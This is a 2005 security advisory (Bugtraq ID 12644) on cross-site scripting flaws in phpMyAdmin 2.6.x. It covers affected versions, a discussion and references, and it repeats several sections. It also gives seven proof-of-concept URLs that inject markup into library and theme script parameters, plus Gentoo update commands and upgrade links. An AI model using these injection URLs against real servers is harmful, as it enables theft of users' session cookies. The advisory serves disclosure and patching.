PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
BID:12644
Info
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12644 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 24 2005 12:00AM |
| Updated: | Feb 24 2005 12:00AM |
| Credit: | Maksymilian Arciemowicz <[email protected]> is credited with the discovery of these issues. |
| Vulnerable: |
S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 phpMyAdmin phpMyAdmin 2.6.1 -rc1 phpMyAdmin phpMyAdmin 2.6.1 phpMyAdmin phpMyAdmin 2.6 .0pl3 phpMyAdmin phpMyAdmin 2.6 .0pl2 |
| Not Vulnerable: |
phpMyAdmin phpMyAdmin 2.6.1 pl1 |
Discussion
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
No exploit is required to leverage any of these issues. The following proof of concepts have been provided:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
No exploit is required to leverage any of these issues. The following proof of concepts have been provided:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
Solution / Fix
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
Solution:
The vendor has released an upgrade dealing with these issues.
Gentoo has released advisory GLSA 200503-07 to address various issues in phpMyAdmin. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:
emerge --sync
emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.1_p2-r1"
SUSE has released advisory SUSE-SR:2005:007 to address these issues. Please see the referenced advisory for more information.
phpMyAdmin phpMyAdmin 2.6 .0pl3
phpMyAdmin phpMyAdmin 2.6 .0pl2
phpMyAdmin phpMyAdmin 2.6.1 -rc1
phpMyAdmin phpMyAdmin 2.6.1
Solution:
The vendor has released an upgrade dealing with these issues.
Gentoo has released advisory GLSA 200503-07 to address various issues in phpMyAdmin. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:
emerge --sync
emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.1_p2-r1"
SUSE has released advisory SUSE-SR:2005:007 to address these issues. Please see the referenced advisory for more information.
phpMyAdmin phpMyAdmin 2.6 .0pl3
-
phpMyAdmin phpMyAdmin 2.6.1-pl1
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar .gz?download
phpMyAdmin phpMyAdmin 2.6 .0pl2
-
phpMyAdmin phpMyAdmin 2.6.1-pl1
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar .gz?download
phpMyAdmin phpMyAdmin 2.6.1 -rc1
-
phpMyAdmin phpMyAdmin 2.6.1-pl1
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar .gz?download
phpMyAdmin phpMyAdmin 2.6.1
-
phpMyAdmin phpMyAdmin 2.6.1-pl1
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.6.1-pl1.tar .gz?download
References
PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
References:
References:
- [ 1149383 ] (in 2.6.1-pl1) Possible XSS Attacks (phpMyAdmin)
- Main Vendor Homepage (OWASP)